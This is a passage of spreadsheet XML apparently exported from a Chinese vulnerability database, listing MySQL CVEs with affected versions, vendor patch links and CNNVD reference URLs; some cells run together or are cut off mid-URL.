    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：Debian Linux 5.0 alphaDebian libmysqlclient15-dev_5.0.51a-24+lenny2_alpha.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysql client15-dev_5.0.51a-24+lenny2_alpha.debDebian libmysqlclient15off_5.0.51a-24+lenny2_alpha.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysql client15off_5.0.51a-24+lenny2_alpha.debDebian mysql-client-5.0_5.0.51a-24+lenny2_alpha.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-cl ient-5.0_5.0.51a-24+lenny2_alpha.debDebian mysql-client_5.0.51a-24+lenny2_all.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-cl ient_5.0.51a-24+lenny2_all.debDebian mysql-common_5.0.51a-24+lenny2_all.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-co mmon_5.0.51a-24+lenny2_all.debDebian mysql-server-5.0_5.0.51a-24+lenny2_alpha.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-se rver-5.0_5.0.51a-24+lenny2_alpha.debDebian mysql-server_5.0.51a-24+lenny2_all.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-se rver_5.0.51a-24+lenny2_all.debMandrakeSoft Linux Mandrake 2008.0Mandriva libmysql-devel-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva libmysql-static-devel-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva libmysql15-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-bench-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-client-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-common-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-max-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-extra-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-management-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-storage-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-tools-5.0.45-8.3mdv2008.0.i586.rpmhttp://www.mandriva.com/en/download/Debian Linux 4.0 amd64Debian libmysqlclient15-dev_5.0.32-7etch11_amd64.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysql client15-dev_5.0.32-7etch11_amd64.debDebian libmysqlclient15off_5.0.32-7etch11_amd64.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysql client15off_5.0.32-7etch11_amd64.debDebian mysql-client-5.0_5.0.32-7etch11_amd64.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-cl ient-5.0_5.0.32-7etch11_amd64.debDebian mysql-client_5.0.32-7etch11_all.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-cl ient_5.0.32-7etch11_all.debDebian mysql-common_5.0.32-7etch11_all.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-co mmon_5.0.32-7etch11_all.debDebian mysql-server-4.1_5.0.32-7etch11_amd64.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-se rver-4.1_5.0.32-7etch11_amd64.debDebian mysql-server-5.0_5.0.32-7etch11_amd64.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-se rver-5.0_5.0.32-7etch11_amd64.debDebian mysql-server_5.0.32-7etch11_all.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-se rver_5.0.32-7etch11_all.debDebian Linux 4.0 ia-32Debian libmysqlclient15-dev_5.0.32-7etch11_i386.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysql client15-dev_5.0.32-7etch11_i386.debDebian libmysqlclient15off_5.0.32-7etch11_i386.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysql client15off_5.0.32-7etch11_i386.debDebian mysql-client-5.0_5.0.32-7etch11_i386.debhttp://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-cl ient-5.0_5.0.32-7etch11_i386.debDebian mysql-client_5.0.32-7etch11_all.</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200907-186</t>
  </si>
  <si>
    <t>MySQL CREATE TABLE调用绕过访问限制漏洞(CVE-2008-7247)</t>
  </si>
  <si>
    <t>影响MySQL:5.0版本(含)到5.0.88版本,5.1版本(含)到5.1.41版本,6.0版本(含)到6.0.9版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-312
http://bugs.mysql.com/bug.php?id=39277</t>
  </si>
  <si>
    <t>MySQL SELECT语句处理拒绝服务漏洞(CVE-2009-4019)</t>
  </si>
  <si>
    <t>影响MySQL:5.0版本(含)到5.0.88版本,5.1版本(含)到5.1.41版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-313
https://bugs.mysql.com/bug.php?id=48291
https://bugs.mysql.com/bug.php?id=39277
https://bugs.mysql.com/bug.php?id=47780
https://bugs.mysql.com/bug.php?id=47320
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-315
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-312
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-314
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200805-032</t>
  </si>
  <si>
    <t>MySQL COM_FIELD_LIST命令绕过权限检查漏洞(CVE-2010-1848)</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.91版本(含),5.1.0版本(含)到5.1.47版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://bugs.mysql.com/bug.php?id=53371</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201006-067
http://lists.apple.com/archives/security-announce/2010/Nov/msg00000.html
http://support.apple.com/kb/HT4435</t>
  </si>
  <si>
    <t>MySQL连接查询拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.92版本,5.1.0版本(含)到5.1.49版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://dev.mysql.com/downloads/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-111</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程未明细节安全漏洞(CVE-2012-0075)</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.2.0版本,5.5.0版本(含)到5.6.0版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.mysql.com/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-281
https://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-278
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-268
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-257
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-269
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-267
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-271
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-260
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-264
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-265
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-266
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-279
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-258
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-262
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-274
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-273
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-244
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-275
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-276
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-261
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-272
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-277</t>
  </si>
  <si>
    <t>Oracle MySQL 5.1.52之前版本多个拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响mysql:5.1.0版本(含)到5.1.52版本,5.0.0版本(含)到5.0.88版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.mysql.com/</t>
  </si>
  <si>
    <t>MySQL Server date_format()拒绝服务漏洞</t>
  </si>
  <si>
    <t>ips-8057（无效）</t>
  </si>
  <si>
    <t>影响MySQL:4.1.0版本(含)到4.1.21版本,5.0.0版本(含)到5.1.1版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://www.debian.org/security/2006/dsa-1112http://www.mysql.com/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200607-302</t>
  </si>
  <si>
    <t>MySQL COM_FIELD_LIST命令远程溢出漏洞(CVE-2010-1850)</t>
  </si>
  <si>
    <t>ips-11000136（无效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://bugs.mysql.com/bug.php?id=53237</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201006-069
https://bugs.mysql.com/bug.php?id=50974
https://bugs.mysql.com/bug.php?id=53237
https://bugs.mysql.com/bug.php?id=53371</t>
  </si>
  <si>
    <t>MySQL多个参数拒绝服务漏洞(CVE-2010-3833)</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.92版本,5.1.0版本(含)到5.1.51版本,5.5.0版本(含)到5.5.6版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-176
http://lists.apple.com/archives/security-announce/2011/Jun/msg00000.html
http://support.apple.com/kb/HT4723
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-310
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-309
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-312
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-311
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-306
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-308
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-307
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-314
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-313
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201011-176
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-175
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-174
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-173
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-172
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201102-279</t>
  </si>
  <si>
    <t>MySQL多个版本资源管理错误漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.91版本(含),5.1.0版本(含)到5.1.50版本(含),5.5.0版本(含)到5.5.5版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-173
https://bugzilla.redhat.com/show_bug.cgi?id=640751
https://bugs.mysql.com/bug.php?id=54476
https://bugs.mysql.com/bug.php?id=55826
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-6.html
https://bugs.mysql.com/bug.php?id=54461
https://bugs.mysql.com/bug.php?id=53544
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-175
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-174</t>
  </si>
  <si>
    <t>MySQL Server mysqld 拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响MySQL:4.1版本(含)到4.1.18版本,5.0版本(含)到5.0.19版本,5.1版本(含)到5.1.6版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了相关补丁，请到厂商的主页下载：Apple Mac OS X 10.4Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.1Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.2Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.3Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.4Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.5Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.6Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.7Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/Apple Mac OS X 10.4.8Apple Mac OS X v10.4.9http://www.apple.com/support/downloads/MySQL AB MySQL 4.1.11Debian libmysqlclient14-dev_4.1.11a-4sarge5_mips.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge5_mips.debDebian libmysqlclient14-dev_4.1.11a-4sarge5_mipsel.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge5_mipsel.debDebian libmysqlclient14-dev_4.1.11a-4sarge5_powerpc.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge5_powerpc.debDebian libmysqlclient14-dev_4.1.11a-4sarge5_s390.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge5_s390.debDebian libmysqlclient14-dev_4.1.11a-4sarge5_sparc.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge5_sparc.debDebian libmysqlclient14_4.1.11a-4sarge5_mips.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge5_mips.debDebian libmysqlclient14_4.1.11a-4sarge5_mipsel.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge5_mipsel.debDebian libmysqlclient14_4.1.11a-4sarge5_powerpc.debDebian GNU/Linux 3.1 alias sargettp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlc lient14_4.1.11a-4sarge5_powerpc.debDebian libmysqlclient14_4.1.11a-4sarge5_s390.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge5_s390.debDebian libmysqlclient14_4.1.11a-4sarge5_sparc.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge5_sparc.debDebian mysql-client-4.1_4.1.11a-4sarge5_mips.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-cl ient-4.1_4.1.11a-4sarge5_mips.debDebian mysql-client-4.1_4.1.11a-4sarge5_mipsel.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-cl ient-4.1_4.1.11a-4sarge5_mipsel.debDebian mysql-client-4.1_4.1.11a-4sarge5_powerpc.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-cl ient-4.1_4.1.11a-4sarge5_powerpc.debDebian mysql-client-4.1_4.1.11a-4sarge5_s390.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-cl ient-4.1_4.1.11a-4sarge5_s390.debDebian mysql-client-4.1_4.1.11a-4sarge5_sparc.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-cl ient-4.1_4.1.11a-4sarge5_sparc.debDebian mysql-server-4.1_4.1.11a-4sarge5_mips.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-se rver-4.1_4.1.11a-4sarge5_mips.debDebian mysql-server-4.1_4.1.11a-4sarge5_mipsel.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfs</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200606-346
https://bugs.mysql.com/bug.php?id=15828</t>
  </si>
  <si>
    <t>MySQL Mysql_real_escape函数 SQL注入漏洞</t>
  </si>
  <si>
    <t>影响MySQL:4.1版本(含)到4.1.20版本,5.0版本(含)到5.0.22版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：MySQL AB MySQL 4.1.11aDebian libmysqlclient14-dev_4.1.11a-4sarge4_alpha.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_alpha.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_amd64.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_amd64.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_arm.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_arm.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_hppa.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_hppa.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_i386.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_i386.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_ia64.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_ia64.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_m68k.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_m68k.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_mips.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_mips.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_mipsel.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_mipsel.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_powerpc.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_powerpc.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_s390.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_s390.debDebian libmysqlclient14-dev_4.1.11a-4sarge4_sparc.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14-dev_4.1.11a-4sarge4_sparc.debDebian libmysqlclient14_4.1.11a-4sarge4_alpha.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_alpha.debDebian libmysqlclient14_4.1.11a-4sarge4_amd64.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_amd64.debDebian libmysqlclient14_4.1.11a-4sarge4_arm.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_arm.debDebian libmysqlclient14_4.1.11a-4sarge4_hppa.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_hppa.debDebian libmysqlclient14_4.1.11a-4sarge4_i386.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_i386.debDebian libmysqlclient14_4.1.11a-4sarge4_ia64.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_ia64.debDebian libmysqlclient14_4.1.11a-4sarge4_m68k.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_m68k.debDebian libmysqlclient14_4.1.11a-4sarge4_mips.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysql client14_4.1.11a-4sarge4_mips.debDebian libmysqlclient14_4.1.11a-4sarge4_mipsel.debDebian GNU/Linux 3.1 alias sargehttp://security.debian.org/pool/updates/ma</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200606-008</t>
  </si>
  <si>
    <t>MySQL查询记录绕过漏洞</t>
  </si>
  <si>
    <t>影响MySQL:3.23.0版本(含)到5.0.18版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本。</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200602-402
https://bugs.mysql.com/bug.php?id=17667</t>
  </si>
  <si>
    <t>MySQL 查询返回创建VIEW查询敏感信息泄露漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.18版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200601-285</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程拒绝服务漏洞(CVE-2012-0087)</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.2.0版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-263</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程信息泄露漏洞(CVE-2012-0484)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-269
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-263
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-279</t>
  </si>
  <si>
    <t>Oracle MySQL  'nstance_options.cc'的Instance_options::complete_initialization 函数缓冲区漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0版本(含)到5.0.23版本,5.1版本(含)到5.1.12版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200607-120
https://bugs.mysql.com/bug.php?id=20622</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB本地访问安全漏洞(CVE-2012-0114)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-279
https://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-278
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-268
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-257
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-269
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-267
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-271
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-260
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-264
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-265
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-266</t>
  </si>
  <si>
    <t>Oracle MySQL Connectors组件安全漏洞 (CVE-2015-2575)</t>
  </si>
  <si>
    <t>影响mysql:5.1.34以下版本(含)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2575
https://www.cnvd.org.cn/flaw/show/CNVD-2015-02640</t>
  </si>
  <si>
    <t>MySQL IF查询处理远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.38版本(含),5.1版本,5.1.1版本,5.1.10版本(含)到5.1.17版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://dev.mysql.com/downloads/mysql/5.0.htmlGentoo------Gentoo已经为此发布了一个安全公告(GLSA-200705-11)以及相应补丁:GLSA-200705-11：MySQL: Two Denial of Service vulnerabilities链接：http://security.gentoo.org/glsa/glsa-200705-11.xml建议所有MySQL用户都升级到最新版本：# emerge --sync# emerge --ask --oneshot --verbose &gt;=dev-db/mysql-5.0.38</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200705-185
http://lists.mysql.com/commits/23685</t>
  </si>
  <si>
    <t>MySQL Rename Table函数访问验证漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.1.0版本(含)到5.1.18版本,5.0.0版本(含)到5.0.42版本,4.1.0版本(含)到4.1.23版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://dev.mysql.com/get/Downloads/MySQL-4.1/mysql-4.1.23.tar.gz/from/pickhttp://dev.mysql.com/get/Downloads/MySQL-5.0/mysql-5.0.41.tar.gz/from/pickhttp://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.18-beta.tar.gz/from/pick</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200705-313
http://www.securitytracker.com/id?1018069</t>
  </si>
  <si>
    <t>MySQL畸形报文处理远程拒绝服务漏洞(CVE-2010-1849)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://bugs.mysql.com/bug.php?id=50974</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201006-068
http://lists.apple.com/archives/security-announce/2010/Nov/msg00000.html
http://support.apple.com/kb/HT4435</t>
  </si>
  <si>
    <t>MySQL 'sql_select.cc' INFORMATION_SCHEMA表远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.0版本(含)到5.0.32版本,5.1.0版本(含)到5.1.14版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200612-657</t>
  </si>
  <si>
    <t>MySQL Item_singlerow_subselect::store函数空指针解引用漏洞</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-116
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-110
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-111
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-112
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-113
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-114
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-115</t>
  </si>
  <si>
    <t>MySQL远程拒绝服务漏洞(CVE-2010-3834)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-175
https://bugs.mysql.com/bug.php?id=55826
https://bugzilla.redhat.com/show_bug.cgi?id=640751
https://bugs.mysql.com/bug.php?id=54476
